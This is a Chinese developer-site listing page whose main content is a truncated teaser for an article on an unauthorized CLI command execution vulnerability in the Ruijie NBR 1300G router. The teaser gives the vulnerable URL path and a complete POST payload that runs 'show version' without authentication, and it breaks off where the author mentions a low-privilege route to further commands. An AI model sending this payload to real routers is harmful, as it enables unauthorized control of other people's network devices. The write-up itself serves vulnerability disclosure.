首页
Python
Java
前端
数据库
Linux
Chatgpt专题
开发者工具箱
1300g专题
锐捷NBR 1300G路由器 越权CLI命令执行漏洞
执行查看版本的命令不需要其它权限, 访问url: /WEB_VMS/LEVEL15/ 构造payload数据包: POST /WEB_VMS/LEVEL15/ HTTP/1.1command=show version&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. 回显如下: 测试发现执行其他命令需要权限,查看手册发现存在低权
阅读更多...